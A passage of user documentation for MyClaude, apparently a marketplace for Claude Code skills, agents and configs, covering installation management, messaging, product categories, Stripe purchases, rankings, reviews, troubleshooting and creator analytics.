If you use git and want to track installed products: ```bash $ git add .claude/skills/ .claude/workflows/ $ git commit -m "track installed MyClaude products" ``` This ensures teammates working on the same repository get the same products without installing separately. If you prefer not to track product files in git, add `.claude/skills/` and similar directories to `.gitignore` — each developer can install independently using `myclaude install`. ## Troubleshooting **`myclaude list` shows no products but files exist in `.claude/`.** Run `myclaude repair` to scan the directory and re-register products that were installed manually or whose registry entries were lost. **`myclaude update` fails with a network error.** Check your internet connection and ensure you are logged in (`myclaude login`). If the error persists, try updating a single product to isolate the issue. **Uninstalled product still appears in Claude Code.** Restart your Claude Code session. Claude Code reads the `.claude/` directory at startup — removing files mid-session may not take effect until the next launch. **Update overwrites my customizations.** Product updates replace the product's core files only. If you modified files inside the product directory, those changes will be lost on update. Keep customizations in a separate file outside the product directory and reference them from your project's `CLAUDE.md`. ## Related pages - [Installing via CLI](/docs/buyers/install-cli) — first-time installation tutorial - [Installing via Web](/docs/buyers/install-web) — download and install from the browser - [Purchasing Products](/docs/buyers/purchasing) — purchase history and re-downloads - [Troubleshooting](/docs/buyers/troubleshooting) — full FAQ for common issues --- # Messaging MyClaude messaging connects you directly with product sellers. Ask pre-purchase questions, report issues, or request features — all without leaving the platform. ## Starting a conversation 1. Navigate to the product page at `myclaude.sh/p/product-slug`. 2. Click the **Ask Seller** button below the product description. 3. Write your message (1-1,000 characters). 4. Click **Send**. A new conversation is created automatically. The seller receives a notification in their dashboard. You can find all your conversations under **Dashboard > Messages**. You must be signed in to send messages. One conversation exists per buyer-product pair — if you message the same seller about the same product again, it continues the existing thread. ## Reading and replying to messages 1. Go to **Dashboard > Messages**. 2. Your conversations are listed with the most recent at the top. Each shows the product name, the other party's username, and a preview of the last message. 3. Click a conversation to open it. 4. Type your reply and click **Send**. Unread messages are marked with a badge on the conversation list. Opening a conversation marks all messages in it as read. ## Message limits and rate limiting | Limit | Value | |-------|-------| | Message length | 1-1,000 characters | | Send rate | 20 messages per minute | | Read rate | 60 requests per minute | | Conversations listed | 50 most recent | | Messages per conversation | 100 displayed | Rate limits are per-user. If you hit the send limit, wait briefly before retrying. ## Writing good messages ### As a buyer **Do:** - Describe your use case so the seller can give a relevant answer. - Lead with the specific question — don't bury it in a wall of text. - Check the product docs before asking something already answered. **Don't:** - Rapid-fire short messages. Compose one clear message instead. - Share credentials, API keys, or secrets in messages. - Use messaging for general Claude Code support — this is for product-specific questions only. ### As a seller **Do:** - Respond within 48 hours when possible. Buyers notice response time. - Thank buyers for bug reports — they're improving your product for free. - Acknowledge feature requests even if you can't commit to a timeline. **Don't:** - Ignore messages. Unresponsive sellers lose buyer trust. - Direct buyers to external platforms for support. - Send promotional messages about your other products. ## Reporting abusive messages If you receive a message that violates the [Content Policy](/docs/legal/content-policy) — spam, harassment, threats, or solicitation — report it: 1. Open the conversation. 2. Click the **Report** flag icon on the offending message. 3. Select a reason from the dropdown. 4. Click **Submit Report**. MyClaude reviews reports within 48 hours. Depending on severity, the offending user may receive a warning or account suspension. You won't see the outcome — but the behavior gets addressed. ## Related pages - [Purchasing Products](/docs/buyers/purchasing) — how the purchase flow works - [Browsing & Discovery](/docs/buyers/browsing) — finding products to ask about - [Content Policy](/docs/legal/content-policy) — what constitutes a policy violation - [Ratings and Reviews](/docs/buyers/ratings-reviews) — leave public feedback after purchase --- # Product Types MyClaude organizes the Claude Code ecosystem into 9 product categories — Skills, Squads, Agents, Workflows, Design Systems, Prompts, CLAUDE.md configs, Applications, and Systems. Each installs with a single command (`myclaude install @creator/product-name`) into your `.claude/` directory. MyClaude is the only Claude Code marketplace with content security scanning, purchase-verified reviews, and Stripe-powered creator payments where creators keep 92% of revenue. Each category solves a fundamentally different problem. Picking the right one is the difference between a tool that slots into your workflow in thirty seconds and one that sits unused in a folder you forget about. ### What is MyClaude? MyClaude is the dedicated marketplace for the Claude Code ecosystem. Unlike free directories that list links without verification, MyClaude scans every product upload with 22 security patterns, enforces quality gates, and provides a full commerce layer with Stripe Connect payments. According to the Princeton GEO study (ACM SIGKDD 2024), marketplace-style platforms with structured product metadata are cited 2.5x more by AI engines than unstructured link lists. ## Quick reference Every product installs into your `.claude/` directory. The entry file is what Claude Code reads to understand the product. | Category | Entry file | Install path | What it does in one sentence | |---|---|---|---| | **Skills** | `SKILL.md` | `.claude/skills/` | Teaches Claude a new callable capability. | | **Squads** | `SQUAD.md` | `.claude/squads/` | Coordinates multiple agents as a team. | | **Agents** | `AGENT.md` | `.claude/agents/` | Deploys a single specialist with focused expertise. | | **Workflows** | `WORKFLOW.md` | `.claude/workflows/` | Chains steps into a repeatable automation. | | **Design Systems** | `DESIGN-SYSTEM.md` | `.claude/design-systems/` | Enforces visual consistency with tokens and rules. | | **Prompts** | `PROMPT.md` | `.claude/prompts/` | Provides a reusable prompt template for a specific task. | | **CLAUDE.md** | `CLAUDE.md` | `.claude/` | Configures Claude Code's behavior at the project level. | | **Applications** | `APP.md` | `.claude/apps/` | Delivers a ready-to-deploy application. | | **Systems** | `SYSTEM.md` | `.claude/systems/` | Packages an entire operational framework. | All products install the same way: ```bash myclaude install @creator/product-name ``` --- ## The 9 categories ### Skills **Skills are the bread and butter of MyClaude.** If you're not sure what to install first, start here. A Skill is a callable prompt routine — a set of instructions that teaches Claude Code how to do something it doesn't already know. Think of it like adding a new verb to Claude's vocabulary. Before the Skill, Claude doesn't know how to "audit my Tailwind for design token violations." After installing the Skill, it does. Skills are small, focused, and composable. The best ones do exactly one thing well. They live in `.claude/skills/` and Claude discovers them automatically. **When to use a Skill:** You need Claude to reliably perform a specific task that requires domain knowledge, a particular methodology, or a structured output format. The task is self-contained — it doesn't need multiple agents collaborating or a multi-step pipeline. **Example product:** `@strix/code-review-security` — a Skill that performs security-focused code reviews using OWASP methodology, catching vulnerabilities that generic reviews miss. **Entry file:** `SKILL.md` --- ### Squads **Think of a Squad as a team roster.** Each member is a specialist, and the Squad definition tells them how to work together. A Squad coordinates multiple agents toward a shared goal. Where a single Agent knows one domain deeply, a Squad orchestrates several agents with different specialties — a frontend agent, a backend agent, and a QA agent all working on the same feature, passing context between them in a defined sequence. This is not just "run three agents." The Squad file defines roles, handoff protocols, and shared context. The coordination is the product. **When to use a Squad:** Your task requires multiple distinct areas of expertise working in sequence or parallel. One agent can't hold all the necessary context. You need orchestration, not just execution. **Example product:** `@fullstack-lab/ship-feature` — a Squad with a planner agent, implementation agent, test agent, and review agent that takes a feature spec from design to merged PR. **Entry file:** `SQUAD.md` --- ### Agents **An Agent is a specialist you hire for a single domain.** While a Skill gives Claude instructions for a task, an Agent gives Claude a persistent identity with defined expertise, tool access, and behavioral constraints. An Agent knows what it's good at, what it should refuse, and how it should communicate. The distinction matters: a Skill is a recipe. An Agent is a chef. The Skill tells Claude *what* to do. The Agent tells Claude *who to be* while doing it. **When to use an Agent:** You need sustained, opinionated expertise in a specific domain — not just a one-off task. The agent's personality and constraints are as important as its capabilities. You want it to push back when you're doing something wrong in its domain. **Example product:** `@devops-forge/k8s-guardian` — an Agent that acts as your Kubernetes operations expert, proactively flagging misconfigurations and enforcing cluster best practices during infrastructure work. **Entry file:** `AGENT.md` --- ### Workflows **A Workflow is a pipeline you run, not a conversation you have.** Workflows chain multiple steps — tools, skills, file operations, validations — into a repeatable, deterministic sequence. Where a Skill is "do this thing," a Workflow is "do these seven things in this order, and stop if step 3 fails." The value is in the choreography. Someone already figured out the exact sequence, error handling, and edge cases. You just run it. **When to use a Workflow:** You have a multi-step process that should run the same way every time. Manual orchestration is error-prone or tedious. The steps have dependencies — step 4 needs output from step 2. **Example product:** `@release-ops/semantic-release` — a Workflow that analyzes commits, bumps versions, generates changelogs, tags the release, and publishes to npm in one command. **Entry file:** `WORKFLOW.md` --- ### Design Systems **A Design System turns your visual rules into something Claude can enforce.** This isn't a Figma export. A Design System product contains token definitions, component constraints, spacing scales, color palettes, and the *rules* governing how they combine. When installed, Claude Code knows that your primary button uses `bg-primary` with `rounded-lg` and `text-sm font-semibold` — and it knows not to deviate. The real power: Claude stops generating code that "looks close enough" and starts generating code that's pixel-correct to your system. **When to use a Design System:** You have established visual standards and you're tired of fixing styling inconsistencies in Claude's output. You want every component Claude generates to conform to your design language without manual correction. **Example product:** `@nova-ui/terminal-dark` — a dark-mode-first Design System with a terminal aesthetic, warm neutrals, glow effects, and a Minor Third type scale. **Entry file:** `DESIGN-SYSTEM.md` --- ### Prompts **A Prompt is a precision tool — one carefully engineered instruction set for one specific job.** Prompts are the most lightweight product type. They don't define agents, orchestrate workflows, or enforce design rules. They're a single, well-crafted system prompt or template optimized for a particular task or domain. The creator did the prompt engineering so you don't have to. Don't confuse simplicity with low value. A Prompt that consistently produces well-structured RFC documents or correctly-formatted database migration plans can save hours of iteration. **When to use a Prompt:** You need a reliable template or instruction set for a recurring task. The task doesn't require tool access, agent identity, or multi-step orchestration — it needs the right words in the right order. **Example product:** `@tech-writer/adr-generator` — a Prompt that produces Architecture Decision Records in a consistent format, including context, options considered, decision rationale, and consequences. **Entry file:** `PROMPT.md` --- ### CLAUDE.md configs **A CLAUDE.md config is a personality transplant for your project.** CLAUDE.md is the file Claude Code reads at the root of every project to understand how to behave. A CLAUDE.md product gives you a pre-built configuration — coding standards, architectural preferences, communication style, domain context, and behavioral rules — that you install and immediately benefit from. This is the highest-leverage product type for teams. Instead of each developer maintaining their own CLAUDE.md, you install one that encodes your organization's engineering culture. **When to use a CLAUDE.md config:** You want to standardize how Claude Code behaves across a project or team. You're starting a new project in an unfamiliar domain and want opinionated defaults from someone who knows it well. **Example product:** `@platform-eng/strict-typescript` — a CLAUDE.md config that enforces strict TypeScript, functional patterns, exhaustive error handling, and test-driven development with no exceptions. **Entry file:** `CLAUDE.md` --- ### Applications **An Application is a finished product, not a building block.** While every other category gives Claude Code new capabilities, an Application is a complete, deployable piece of software built for or with Claude Code. It has a UI, a purpose, and it runs on its own. You install it to *use* it, not to extend Claude. **When to use an Application:** You need a ready-made tool — a dashboard, a CLI utility, a local web app — that solves a complete problem. You want to deploy and use, not integrate and extend. **Example product:** `@indie-tools/prompt-lab` — a local web application for testing, versioning, and comparing prompt variations with side-by-side output diffs. **Entry file:** `APP.md` --- ### Systems **A System is the whole operating model in a box.** Systems are the most comprehensive product type. Where a Workflow chains steps and a Squad coordinates agents, a System packages an entire operational framework — the methodology, the tools, the configurations, the workflows, and the rules that tie them together. It's an opinionated way of working. Installing a System is a commitment. It's not a utility you reach for occasionally — it's a paradigm you adopt. **When to use a System:** You want a complete, opinionated methodology for a domain. You're willing to work within someone else's framework because they've already solved the meta-problems — what to do, in what order, with what tools, and how to handle edge cases. **Example product:** `@kairo-dev/fullstack-ops` — a System that packages a complete development methodology: commit conventions, PR templates, review protocols, deployment checklists, monitoring setup, and incident response workflows. **Entry file:** `SYSTEM.md` --- ## Not sure which type? Start here. Most people overthink this. Walk through these questions: **"I need Claude to do a specific task better."** That's a **Skill**. Start here. Most problems are Skill-shaped. **"I need Claude to *be* someone — a specialist who pushes back and has opinions."** That's an **Agent**. The identity and constraints matter as much as the capability. **"I need multiple specialists working together on one goal."** That's a **Squad**. One agent isn't enough; you need coordination. **"I need the same multi-step process to run identically every time."** That's a **Workflow**. Repeatability is the point. **"I need Claude to generate UI code that matches my design language."** That's a **Design System**. Visual consistency is the goal. **"I just need a really good prompt template for a specific task."** That's a **Prompt**. Lightweight, no infrastructure. **"I need to configure how Claude behaves in my project."** That's a **CLAUDE.md** config. Project-wide behavior rules. **"I need a finished tool I can deploy and use right now."** That's an **Application**. It runs on its own. **"I need a complete methodology, not just tools."** That's a **System**. You're adopting a framework. ## Skill vs Agent vs Squad vs Workflow These four get confused the most. Here's the sharp distinction: | | Skill | Agent | Squad | Workflow | |---|---|---|---|---| | **Core idea** | A task Claude can perform | A role Claude can inhabit | A team Claude can deploy | A pipeline Claude can run | | **Analogy** | A recipe | A chef | A kitchen brigade | An assembly line | | **State** | Stateless — runs and done | Persistent identity | Multi-agent coordination | Sequential steps with dependencies | | **When to pick** | One task, one output | Ongoing domain expertise | Cross-domain collaboration | Deterministic multi-step process | | **Complexity** | Low | Medium | High | Medium | | **Example need** | "Review this PR for security issues" | "Be my security advisor for this project" | "Plan, build, test, and review this feature" | "Run the full release process" | The simplest test: **if a Skill solves your problem, use a Skill.** Only reach for the more complex types when the simpler one genuinely falls short. ## Related pages - [Concepts Overview](/docs/getting-started/concepts) — the marketplace mental model - [Browsing & Discovery](/docs/buyers/browsing) — how to find products on MyClaude - [Installing via CLI](/docs/buyers/install-cli) — step-by-step CLI installation guide - [Installing via Web](/docs/buyers/install-web) — browser-based installation - [Writing Skills Guide](/docs/creators/writing-skills) — build and publish your first Skill --- # Purchasing Products Purchase paid products on MyClaude via Stripe Checkout. Creators receive 92% of each sale. MyClaude acts as a pass-through marketplace. Your payment is processed by Stripe — MyClaude never stores card details. ## How purchasing works The full flow from click to download: 1. You click **Buy** on a product page (web) or run `myclaude install` on a paid product (CLI). 2. MyClaude creates a Stripe Checkout session and redirects you. 3. You complete payment on Stripe's hosted page. 4. Stripe sends a webhook to MyClaude confirming the payment. 5. MyClaude creates a permanent order record tied to your account. 6. The download becomes available immediately. Orders are created exclusively by the Stripe webhook — never by client-side code. This means a purchase only unlocks a download after Stripe independently confirms payment. ## Payment flow | Step | Who acts | What happens | |------|----------|--------------| | Initiate | You | Click Buy or `myclaude install` | | Redirect | MyClaude | Opens Stripe Checkout | | Pay | You | Card, Apple Pay, or Google Pay | | Confirm | Stripe → MyClaude webhook | Order written to your account | | Download ready | MyClaude | Signed URL generated on request | Supported payment methods depend on your region and Stripe's availability. MyClaude does not offer invoices or net terms. ## After purchase — downloading Once your order is confirmed, download from the web: 1. Return to the product page. The Buy button is replaced by **Download**. 2. Click Download. MyClaude generates a signed URL valid for 5 minutes. 3. Your browser opens the file. The signed URL expires after one use or 5 minutes, whichever comes first. Via CLI: ```bash $ myclaude install @creator/product-name ``` If you already purchased the product, the CLI skips the payment step and downloads directly. ### Why signed URLs? Paid product files are never exposed as public links. Every download request is verified against your order record on the server. The signed URL is generated fresh each time — it cannot be shared or reused. ## Receipts and purchase history Your purchase history is available at [myclaude.sh/dashboard](/dashboard) under **Purchases**. | What you get | Where | |-------------|-------| | Stripe email receipt | Your email inbox immediately after payment | | Order record | Dashboard → Purchases | | Re-download | Anytime from the product page or via CLI | There is no download limit. You can re-download a purchased product at any time from the same account. ### Refunds Refund requests are handled case by case. Contact support at the email in your Stripe receipt. Digital products are generally non-refundable unless the file is materially different from its description. ## Related pages - [Installing via CLI](/docs/buyers/install-cli) — install products from the terminal - [Browsing & Discovery](/docs/buyers/browsing) — find products to buy - [Product Types](/docs/buyers/product-types) — understand what you are purchasing --- # Rankings The rankings page at `myclaude.sh/rankings` shows the top MyClaude products sorted by community engagement metrics. Use it to discover trending and high-quality products. ## Accessing rankings Navigate to `myclaude.sh/rankings` or click **Rankings** in the navigation bar. No sign-in required. ## Three ranking tabs The page has three tabs, each showing up to 50 products. | Tab | Sort order | Best for | |-----|-----------|----------| | **Popular** | Likes + downloads weighted | Finding community-endorsed products | | **Downloads** | Total download count | Finding the most-installed products | | **Newest** | Publication date (most recent first) | Discovering recently published products | Each tab displays products with their title, creator, category, download count, rating, and price. ## What makes a product rank higher Products on the Popular tab rank by a weighted combination of likes and downloads. The Downloads tab uses raw download count. The Newest tab uses publication date. Factors that push products up the rankings: 1. **Downloads.** Every install counts. Free products tend to accumulate downloads faster. 2. **Likes.** Users who browse or install can like a product from the product page. 3. **Ratings and reviews.** While not directly a sort factor, high ratings attract more downloads and likes, which improve rank. 4. **Recency.** The Newest tab favors recently published products regardless of engagement. ## Rankings vs. explore Rankings and the explore page serve different purposes. | Aspect | Rankings (`/rankings`) | Explore (`/explore`) | |--------|----------------------|---------------------| | **What it shows** | Top 50 products per tab | Paginated, filterable product list | | **Sort options** | Popular, Downloads, Newest | Relevance, Downloads, Newest, Price | | **Filtering** | None | Category, price range, tags, search query | | **Purpose** | Browse what the community values most | Find a specific product for your use case | Use **/explore** when you know what you need. Use **/rankings** to see what is trending. ## For creators: improving your ranking Your products appear in rankings based on organic engagement. There is no way to pay for placement. - Write clear descriptions and thorough READMEs to convert page views into downloads - Use relevant tags so your product appears in the right searches (which drive downloads) - Price free products strategically to build a download base, then monetize with premium offerings - See the [Gamification](/docs/getting-started/gamification) page for how XP and creator levels work separately from product rankings ## Related pages - [Browsing & Discovery](/docs/buyers/browsing) -- search and filter on the explore page - [Product Types](/docs/buyers/product-types) -- the 9 product categories - [Ratings and Reviews](/docs/buyers/ratings-reviews) -- how product ratings work - [Gamification](/docs/getting-started/gamification) -- XP, levels, and creator rank tiers --- # Ratings and Reviews Leave ratings and reviews on MyClaude products you have purchased. Verified buyers only. Reviews help other buyers make informed decisions and help creators improve their products. MyClaude only accepts reviews from accounts with a verified purchase or download record for the product. ## Who can leave a review | Product type | Requirement | |-------------|-------------| | Paid product | You must have a completed purchase on your account | | Free product | You must have downloaded the product at least once | Anonymous reviews are not supported. Your review is displayed with your MyClaude username and a **Verified Buyer** or **Verified Download** badge. ## How to leave a review 1. Navigate to the product page at `myclaude.sh/p/product-slug`. 2. Scroll to the **Reviews** section below the product description. 3. Select a star rating from 1 to 5. 4. Write your review in the text field. Minimum 20 characters. 5. Click **Submit Review**. Your review appears on the product page immediately after submission. ## Rating scale | Stars | Meaning | |-------|---------| | 5 | Excellent — works perfectly, well-documented, high value | | 4 | Good — works well with minor issues or gaps | | 3 | Average — functional but has notable shortcomings | | 2 | Below average — significant issues that limit usefulness | | 1 | Poor — does not work as described or is unusable | ## Writing a helpful review A useful review answers the question: "Would this help someone decide whether to install this product?" **Include:** - What you used the product for (your use case). - What worked well and what did not. - The version you tested, if relevant. - Whether you would recommend it and to whom. **Avoid:** - One-word reviews ("great", "bad"). The 20-character minimum exists for this reason. - Issues unrelated to the product (Stripe problems, general Claude Code bugs). - Personal attacks on the creator. ### Example of a strong review > "Used @kairo/review-skill for two weeks on a TypeScript monorepo with 200+ files. It catches naming inconsistencies and unused imports reliably. Missed some edge cases with barrel exports but the creator shipped a fix in 1.3.0. Recommended for medium-to-large TS projects." ## Editing a review 1. Navigate to the product page. 2. Your existing review appears at the top of the Reviews section with an **Edit** button. 3. Modify your star rating or text. 4. Click **Save Changes**. You can edit your review at any time. The product page shows the date of the most recent edit. ## Deleting a review 1. Navigate to the product page. 2. Click **Delete** on your existing review. 3. Confirm the deletion in the dialog. Deleted reviews are permanently removed. The product's average rating is recalculated immediately. ## How reviews affect products Reviews influence product visibility in two ways: | Factor | Effect | |--------|--------| | Average rating | Products with higher ratings appear higher in search results and on the explore page | | Review count | Products with more reviews receive a ranking boost, signaling community validation | Creators see aggregate rating data and individual reviews on their creator dashboard. They cannot delete or hide buyer reviews. ## Review moderation MyClaude enforces a content policy on all reviews. Reviews are removed if they contain: - Spam, advertising, or promotional links. - Profanity, hate speech, or personal attacks. - Content unrelated to the product being reviewed. - Deliberately misleading claims about product functionality. - Multiple reviews from the same account for the same product (only one review per product is allowed). If your review is removed for a policy violation, you receive an email notification with the reason. You may submit a revised review that complies with the policy. ### Reporting a review If you believe a review violates the content policy, click the **Report** flag icon next to the review. Select a reason and submit. The MyClaude team reviews reports and takes action within 48 hours. ## Related pages - [Purchasing Products](/docs/buyers/purchasing) — how to buy products (required before reviewing paid products) - [Browsing & Discovery](/docs/buyers/browsing) — how ratings appear in search results - [Product Types](/docs/buyers/product-types) — understand the categories you are reviewing --- # Troubleshooting Common issues and solutions for MyClaude buyers — installation, purchases, downloads, CLI, and account problems. Each entry follows the pattern: symptom, cause, fix. If your issue is not listed here, contact support using the guidance at the bottom of this page. --- ## Installation issues ### Product files exist but Claude Code does not detect them **Symptom:** You installed a product and the files are in `.claude/`, but Claude Code does not recognize the skill, agent, or workflow. **Cause:** Claude Code reads the `.claude/` directory at startup. Files added mid-session are not detected automatically. **Fix:** Restart your Claude Code session. If the product still does not appear, verify the files are in the correct subdirectory — for example, skills must be in `.claude/skills/{product-name}/`, not `.claude/{product-name}/`. ### `myclaude install` fails with "EACCES permission denied" **Symptom:** The CLI throws a permission error when writing files to the `.claude/` directory. **Cause:** The current user does not have write permission to the project directory or the `.claude/` subdirectory. **Fix:** Check directory permissions with `ls -la .claude/`. On Unix systems, run `chmod -R u+w .claude/` to grant write access. On Windows, right-click the folder, go to Properties, and adjust permissions under the Security tab. ### `myclaude install` fails with "product not found" **Symptom:** The CLI reports the product handle does not exist in the registry. **Cause:** The handle is misspelled, the product was unpublished by the creator, or the product is in a different registry region. **Fix:** Double-check the exact handle on the product page at myclaude.sh. Handles are case-sensitive and follow the `@creator/product-name` format. If the product page loads on the web but the CLI cannot find it, run `myclaude login` to refresh your session. ### Installation succeeds but the product does not work correctly **Symptom:** Files are installed and detected, but the product behaves unexpectedly or throws errors. **Cause:** Version mismatch with your Claude Code version, missing dependencies, or a product bug. **Fix:** 1. Check the product page for version compatibility notes. 2. Run `myclaude update @creator/product-name` to ensure you have the latest version. 3. Read the product's included README or documentation for configuration requirements. 4. If the issue persists, leave a review describing the problem or contact the creator through their profile page. --- ## Purchase issues ### Stripe Checkout page does not load **Symptom:** Clicking Buy redirects to a blank page or shows a Stripe error. **Cause:** Browser extensions (ad blockers, privacy tools) may block Stripe's hosted checkout domain. Alternatively, Stripe may be temporarily unavailable in your region. **Fix:** Disable ad blockers and privacy extensions for `checkout.stripe.com`, then retry. If the page still does not load, try a different browser. Stripe availability by country is listed at [stripe.com/global](https://stripe.com/global). ### Payment completed but no order appears in my dashboard **Symptom:** Stripe charged your card, you received a Stripe email receipt, but the order does not appear at [myclaude.sh/dashboard](/dashboard). **Cause:** The Stripe webhook that creates the order may be delayed. Under normal conditions this takes under 10 seconds, but network issues can extend it to a few minutes. **Fix:** Wait 2 minutes, then refresh your dashboard. If the order still does not appear after 5 minutes, contact support with your Stripe receipt email — it contains a payment ID that can be used to locate and reconcile the order. ### Duplicate charge for the same product **Symptom:** You see two charges on your bank statement for a single product. **Cause:** This is rare but can occur if you clicked Buy twice in quick succession before the first checkout session completed. **Fix:** Contact support with both charge references from your bank statement. Duplicate charges are refunded within 5-10 business days after verification. ### Refund not received **Symptom:** Support approved a refund but the amount has not appeared on your statement. **Cause:** Refunds are processed through Stripe and typically take 5-10 business days to appear, depending on your bank. **Fix:** Check your Stripe receipt email for the refund confirmation. If more than 10 business days have passed without the refund appearing, contact your bank with the Stripe refund reference. --- ## Download issues ### Download button does not appear after purchase **Symptom:** You completed payment but the product page still shows Buy instead of Download. **Cause:** The order confirmation webhook has not yet been processed. **Fix:** Wait 30 seconds and refresh the page. If the button does not change within 2 minutes, try logging out and back in to refresh your session. Check your [dashboard](/dashboard) — if the order appears there, the product page may need a hard refresh (Ctrl+Shift+R / Cmd+Shift+R). ### Signed URL expired before download completed **Symptom:** The download starts but fails partway through, or the browser shows an access denied error. **Cause:** Signed download URLs expire after 5 minutes. Large files on slow connections may not complete in time. **Fix:** Return to the product page and click Download again to generate a fresh signed URL. There is no limit on how many times you can request a new URL. ### Downloaded ZIP file is corrupted **Symptom:** Extracting the ZIP fails with a CRC error or "unexpected end of archive." **Cause:** The download was interrupted or the file was partially transferred before the signed URL expired. **Fix:** Delete the corrupted file and re-download from the product page. If corruption recurs, try a different browser or use the CLI (`myclaude install @creator/product-name`), which includes integrity verification. --- ## CLI issues ### `myclaude` command not found **Symptom:** Running `myclaude` in the terminal returns "command not found" or "not recognized." **Cause:** The myclaude CLI is not installed globally, or the npm global bin directory is not in your system PATH. **Fix:** ```bash $ npm install -g @myclaude-cli/cli ``` If the command is still not found after installing, check your PATH: ```bash $ npm config get prefix ``` Ensure the `bin/` subdirectory of that path is in your system PATH. On macOS/Linux, add it to your shell profile (`~/.bashrc`, `~/.zshrc`). On Windows, add it via System Environment Variables. ### `myclaude login` opens browser but authentication does not complete **Symptom:** The browser opens to the MyClaude login page, you sign in, but the CLI never receives the confirmation. **Cause:** The local callback server that receives the auth token may be blocked by a firewall or the browser redirect failed. **Fix:** 1. Ensure no firewall or antivirus is blocking localhost connections on the port the CLI uses (shown in the terminal output). 2. After signing in on the web, check if the browser shows a "You may close this tab" message. If it does, return to the terminal — the CLI should have received the token. 3. If the CLI is still waiting, press Ctrl+C and try `myclaude login` again. ### `myclaude update` reports "already up to date" but the product page shows a newer version **Symptom:** The CLI says no updates are available, but the web interface shows a newer version number. **Cause:** Registry cache. The CLI caches the product registry locally to reduce network requests. **Fix:** ```bash $ myclaude cache clear $ myclaude update @creator/product-name ``` ### `myclaude repair` does not detect manually installed products **Symptom:** You placed product files manually in `.claude/` but `myclaude repair` does not find them. **Cause:** The repair command identifies products by their manifest file (`vault.json` or `.vault-manifest`). If the product was extracted without this file, repair cannot recognize it. **Fix:** Re-download the product from the web or CLI to get a complete package with the manifest. Alternatively, create a minimal `vault.json` in the product directory: ```json { "name": "@creator/product-name", "version": "1.0.0", "category": "skills" } ``` Then run `myclaude repair` again. --- ## Account issues ### Cannot log in — "account not found" **Symptom:** You enter your email and password but MyClaude says the account does not exist. **Cause:** You may have registered with a different authentication provider (Google, GitHub) than the one you are trying now. **Fix:** Try all available sign-in methods on the [login page](/login). MyClaude supports email/password, Google, and GitHub authentication. If you registered with Google, clicking "Sign in with Google" will find your account. ### Username change not reflected on published reviews **Symptom:** You changed your username in settings but your old username still appears on reviews you wrote. **Cause:** Username propagation to existing reviews may take up to 24 hours. **Fix:** No action needed. The update propagates automatically. If your old username still appears after 24 hours, contact support. ### Cannot access purchases after changing email **Symptom:** You changed your email address and can no longer see your purchase history. **Cause:** Email changes do not affect your account identity — purchases are tied to your account UID, not your email. This symptom usually indicates you accidentally created a second account with the new email instead of updating the existing one. **Fix:** Log out and sign in with your original authentication method. If you have two accounts and need them merged, contact support with both email addresses. --- ## Error codes If the CLI or API returns a numeric error code, use this table to identify the cause: | Code | Meaning | Fix | |------|---------|-----| | `401` | Not authenticated | Run `myclaude login` | | `403` | Not authorized (e.g., downloading a paid product without purchase) | Purchase the product first | | `404` | Product not found | Check the product handle spelling | | `409` | Conflict (e.g., product already installed) | Run `myclaude list` to confirm, then `myclaude update` if needed | | `422` | Invalid request (e.g., malformed product handle) | Verify the command syntax | | `429` | Rate limited — too many requests | Wait 60 seconds and retry | | `500` | Server error | Retry after a few minutes. If persistent, check [myclaude.sh](https://myclaude.sh) for status | | `503` | Service temporarily unavailable | MyClaude is under maintenance. Retry later | --- ## Contact support If your issue is not covered here or the suggested fix does not resolve it: 1. Visit [myclaude.sh/dashboard](/dashboard) and click **Support** in the navigation. 2. Describe the issue, including: what you were trying to do, what happened, and any error messages or codes. 3. Include your MyClaude username and, for purchase issues, the Stripe receipt email or payment ID. Support responds within 48 hours on business days. ## Related pages - [Installing via CLI](/docs/buyers/install-cli) — CLI installation tutorial - [Installing via Web](/docs/buyers/install-web) — web download and manual install - [Purchasing Products](/docs/buyers/purchasing) — payment flow and receipts - [Managing Products](/docs/buyers/managing-products) — update, list, and uninstall - [Ratings and Reviews](/docs/buyers/ratings-reviews) — leaving and editing reviews --- # Analytics Dashboard Track your products, downloads, sales, revenue, XP, and reviews from the MyClaude creator dashboard. Your dashboard is your command center. Everything you need to understand how your products are performing lives in two pages: the main dashboard at `/dashboard` and the sales page at `/sales`. This guide walks through both. ## Accessing your dashboard Log in at [myclaude.sh/login](/login) and navigate to [myclaude.sh/dashboard](/dashboard). The dashboard requires authentication — you must be logged in to see your data. If you do not have an account yet, start with [Creator Onboarding](/docs/creators/onboarding). ## Dashboard overview The main dashboard displays five stat cards across the top, followed by your XP progress, achievements, published products, purchases, and messages. ### Key metrics | Metric | What it measures | Where it appears | |--------|-----------------|------------------| | **Products** | Total products you have published | Dashboard stat card | | **Downloads** | Total downloads across all your products | Dashboard stat card | | **Followers** | Users following your creator profile | Dashboard stat card | | **Likes** | Total likes across all your products | Dashboard stat card | | **Level** | Your creator level based on XP | Dashboard stat card + profile | These metrics update in real time. When a buyer downloads or likes one of your products, the count increments immediately. ### Your product table Below the stats, the dashboard shows a table of all your published products. Each row displays the product name, category, status, and key stats. Use this to quickly identify which products are performing and which need attention. Products with `pending_review` status will auto-publish once your email is verified. If a product stays in pending status, check that your email verification is complete in [Settings](/dashboard/settings). ## Sales page Navigate to [myclaude.sh/sales](/sales) for revenue tracking. The sales page requires Stripe Connect to be active — if you have not connected Stripe yet, the page shows a connection prompt. ### How to connect Stripe 1. Go to `/sales` 2. Click **Connect Stripe** 3. Complete Stripe's onboarding (identity, bank account, business type) 4. Return to MyClaude — a green "Stripe Connected" badge confirms the link Once connected, the sales page displays two top-level stats and a chronological order history. ### Sales metrics | Metric | What it shows | |--------|--------------| | **Sales count** | Total number of paid orders you have received | | **Revenue** | Your total earnings (your 92% share after the 8% platform fee) | Each order in the history shows: - Product name and category badge - Date and time of purchase - Your earnings for that sale (and the original sale price) - Buyer's public profile (username and avatar) - Refund status, if applicable Revenue amounts on the sales page reflect your share — the 92% you receive after the platform's 8% fee. Stripe's processing fee (~2.9% + $0.30) is deducted separately by Stripe from your payout. See [Monetization Guide](/docs/creators/monetization) for the full revenue breakdown. ## Understanding your stats ### Downloads vs. purchases Downloads and purchases are different events with different signals. | Event | Applies to | What it means | |-------|-----------|---------------| | **Download** | Free and paid products | Someone installed your product. For paid products, a purchase happened first. | | **Purchase** | Paid products only | A buyer completed checkout. Appears on the sales page. | A free product with 500 downloads and a paid product with 50 purchases can both be successful. Downloads measure reach. Purchases measure revenue. ### Free vs. paid product metrics | Metric | Free products | Paid products | |--------|--------------|---------------| | Downloads | Direct installs, no purchase required | Post-purchase installs | | Likes | Social signal from any user | Social signal from any user | | Revenue | None | Tracked on sales page | | Reviews | From anyone who installed | From verified buyers | Free products tend to accumulate downloads faster because there is no purchase 